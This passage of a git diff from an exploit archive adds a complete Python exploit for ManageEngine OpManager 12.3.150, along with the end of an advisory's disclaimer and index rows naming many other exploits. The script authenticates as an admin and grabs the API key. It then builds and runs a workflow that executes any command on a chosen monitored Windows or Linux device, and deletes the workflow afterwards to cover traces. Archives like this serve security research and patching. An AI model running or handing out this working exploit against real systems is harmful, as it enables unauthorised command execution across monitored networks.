is estimated as high. + + +Credits & Authors: +================== +PingFanZettaKe [VXRL Team] - +https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php \ No newline at end of file diff --git a/exploits/windows/webapps/47255.py b/exploits/windows/webapps/47255.py new file mode 100755 index 000000000..3615a7ba5 --- /dev/null +++ b/exploits/windows/webapps/47255.py @@ -0,0 +1,266 @@ +#!/usr/bin/env python3 + +# Exploit Title: ManageEngine opManager Authenticated Code Execution +# Google Dork: N/A +# Date: 08/13/2019 +# Exploit Author: @kindredsec +# Vendor Homepage: https://www.manageengine.com/ +# Software Link: https://www.manageengine.com/network-monitoring/download.html +# Version: 12.3.150 +# Tested on: Windows Server 2016 +# CVE: N/A + +import requests +import re +import random +import sys +import json +import string +import argparse + +C_WHITE = '\033[1;37m' +C_BLUE = '\033[1;34m' +C_GREEN = '\033[1;32m' +C_YELLOW = '\033[1;33m' +C_RED = '\033[1;31m' +C_RESET = '\033[0m' +LOGIN_FAIL_MSG = "Invalid username and/or password." + +def buildRandomString(length=10): + letters = string.ascii_lowercase + return ''.join(random.choice(letters) for i in range(length)) + + +def getSessionData(target, user, password): + + session = requests.Session() + session.get(target) + + # Login Sequence + randSid = random.uniform(-1,1) + getParams = { "requestType" : "AJAX" , "sid" : str(randSid) } + postData = { "eraseAutoLoginCookie" : "true" } + session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams ) + + postData = { "loginFromCookieData" : "false", + "ntlmv2" : "false", + "j_username" : user, + "j_password" : password + } + initialAuth = session.post( url = target + "/j_security_check", data = postData ) + + + if LOGIN_FAIL_MSG in initialAuth.text: + + print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.") + sys.exit(1) + + elif initialAuth.status_code != 200: + print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.") + sys.exit(1) + + apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text) + apiKey = apiKeyReg.group(0).split('"')[1] + + return { "session" : session , "apiKey" : apiKey } + + + + +def getDeviceList(target, session, apiKey): + + deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } ) + + devices = {} + devicesJsonParsed = json.loads(deviceList.text) + for row in devicesJsonParsed["rows"]: + devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ] + + return devices + + + +def buildTaskWindows(target, session, apiKey, device, command): + + # Build Task + taskName = buildRandomString() + workFlowName = buildRandomString(15) + + jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":""" + jsonData += '"' + taskName + '"' + jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":""" + jsonData += '"' + command + '"' + jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":""" + jsonData += '"' + workFlowName + '"' + jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":[""" + jsonData += '"' + device + '"' + jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee""" + jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y""" + jsonData += """earlyMin":"0"},"criteriaDetails":{}}}""" + + makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData }) + + if "has been created successfully" in makeWorkFlow.text: + print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow") + else: + print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .") + sys.exit(1) + + return workFlowName + + +def buildTaskLinux(target, session, apiKey, device, command): + + taskName = buildRandomString() + workFlowName = buildRandomString(15) + + jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":""" + jsonData += '"' + taskName + '"' + jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":""" + jsonData += '"' + command + '"' + jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":""" + jsonData += '"' + workFlowName + '"' + jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":[""" + jsonData += '"' + device + '"' + jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee""" + jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y""" + jsonData += """earlyMin":"0"},"criteriaDetails":{}}}""" + + makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData }) + + if "has been created successfully" in makeWorkFlow.text: + print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow") + else: + print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .") + sys.exit(1) + + return workFlowName + + +# Get the ID of the newly created workflow +def getWorkflowID(target, session, apiKey, workflowName): + + getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey }) + + rbID = -100 + workflowJsonParsed = json.loads(getID.text) + for wf in workflowJsonParsed: + if wf['name'] == workflowName: + rbID = wf['rbID'] + + if rbID == -100: + print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...") + sys.exit(1) + + return rbID + + +def getDeviceID(target, session, apiKey, rbID, device): + + getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID }) + wfDevicesJsonParsed = json.loads(getDevices.text) + wfDevices = wfDevicesJsonParsed["defaultDevices"] + deviceID = list(wfDevices.keys())[0] + + return deviceID + + + +def runWorkflow(target, session, apiKey, rbID, device): + + targetDeviceID = getDeviceID(target, session, apiKey, rbID, device) + + print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .") + workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 } ) + + if re.match(r"^\[.*\]$", workflowExec.text.strip()): + print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!") + else: + print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.") + sys.exit(1) + + deleteWorkflow(target, session, apiKey, rbID) + print(f"{C_GREEN}[+]{C_RESET} Exploit complete!") + + +def deleteWorkflow(target, session, apiKey, rbID): + + print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .") + delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID }) + + +def main(): + + parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.") + parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)") + parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.") + parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.") + parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.") + + args = parser.parse_args() + + insufficient_args = False + if not args.u: + print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.") + insufficient_args = True + if not args.t: + print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.") + insufficient_args = True + if not args.p: + print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.") + insufficient_args = True + if not args.c: + print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.") + insufficient_args = True + + if insufficient_args: + sys.exit(1) + + + sessionDat = getSessionData(args.t, args.u, args.p) + session = sessionDat["session"] + apiKey = sessionDat["apiKey"] + + devices = getDeviceList(args.t, session, apiKey) + + # if there's only one device in the OpManager instance, default to running commands on that device; + # no need to ask the user. + if len(devices.keys()) == 1: + device = list(devices.keys())[0] + else: + print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:") + print("") + counter = 1 + for key in devices.keys(): + print(f" {counter}: {key} ({devices[key][0]}) ({devices[key][1]})") + + print("") + while True: + try: + prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: " + devSelect = int(input(prompt)) + except KeyboardInterrupt: + sys.exit(1) + except ValueError: + print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .") + sys.exit(1) + + if devSelect < 1 or devSelect > len(list(devices.keys())): + print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .") + sys.exit(1) + + else: + device = list(devices.keys())[counter - 1] + break + + # don't hate, it works doesn't it? + if "indows" in devices[device][1]: + workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c) + else: + workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c) + + workflowID = getWorkflowID(args.t, session, apiKey, workflowName) + runWorkflow(args.t, session, apiKey, workflowID, device) + + +main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 67775d97a..57e6a5792 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6525,6 +6525,8 @@ id,file,description,date,author,type,platform,port 47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks, 47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux, 47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple, +47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows, +47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10632,6 +10634,7 @@ id,file,description,date,author,type,platform,port 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows, 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux, 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows, +47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17606,6 +17609,7 @@ id,file,description,date,author,type,platform,port 47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux, 47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php, 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php, +47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41606,3 +41610,11 @@ id,file,description,date,author,type,platform,port 47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80 47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80 47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80 +47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80 +47235,exploits/php/webapps/47235.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell",2019-08-12,xerubus,webapps,php, +47247,exploits/php/webapps/47247.txt,"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting",2019-08-14,"Ilca Lucian Florin",webapps,php,80 +47249,exploits/php/webapps/47249.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection",2019-08-14,qw3rTyTy,webapps,php,80 +47250,exploits/hardware/webapps/47250.rb,"D-Link DIR-600M - Authentication Bypass (Metasploit)",2019-08-14,"Devendra Singh Solanki",webapps,hardware,80 +47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80 +47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows, +47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,